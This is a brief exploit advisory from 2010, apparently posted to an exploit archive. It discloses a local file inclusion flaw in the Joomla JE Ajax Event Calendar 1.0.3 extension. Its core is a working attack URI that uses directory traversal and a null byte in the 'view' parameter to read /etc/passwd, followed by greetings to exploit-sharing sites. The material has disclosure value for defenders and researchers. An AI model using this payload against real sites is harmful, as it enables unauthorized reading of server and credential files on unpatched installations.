Joomla JE Ajax Event Calendar 1.0.3 Local File Inclusion

`# Exploit Title: JE Ajax Event Calendar Local File Inclusion Vulnerability  
# Date: 14.05.2010  
# Author: Valentin  
# Category: webapps/0day  
# Version: 1.0.3  
# Tested on:   
# CVE :   
# Code :   
  
  
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]  
>> General Information   
Advisory/Exploit Title = JE Ajax Event Calendar Local File Inclusion Vulnerability  
Author = Valentin Hoebel  
Contact = [email protected]  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]  
>> Product information  
Name = JE Ajax event calendar  
Vendor = Harmis Technology  
Vendor Website = http://joomlaextensions.co.in/  
Affected Version(s) = 1.0.3  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]  
>> #1 Vulnerability  
Type = Local File Inclusion  
Example URI = index.php?option=com_jeajaxeventcalendar&view=../../../../../../etc/passwd%00  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]  
>> Additional Information  
Advisory/Exploit Published = 14.05.2010  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]  
>> Misc  
Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!  
<3 packetstormsecurity.org!  
  
  
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]  
  
`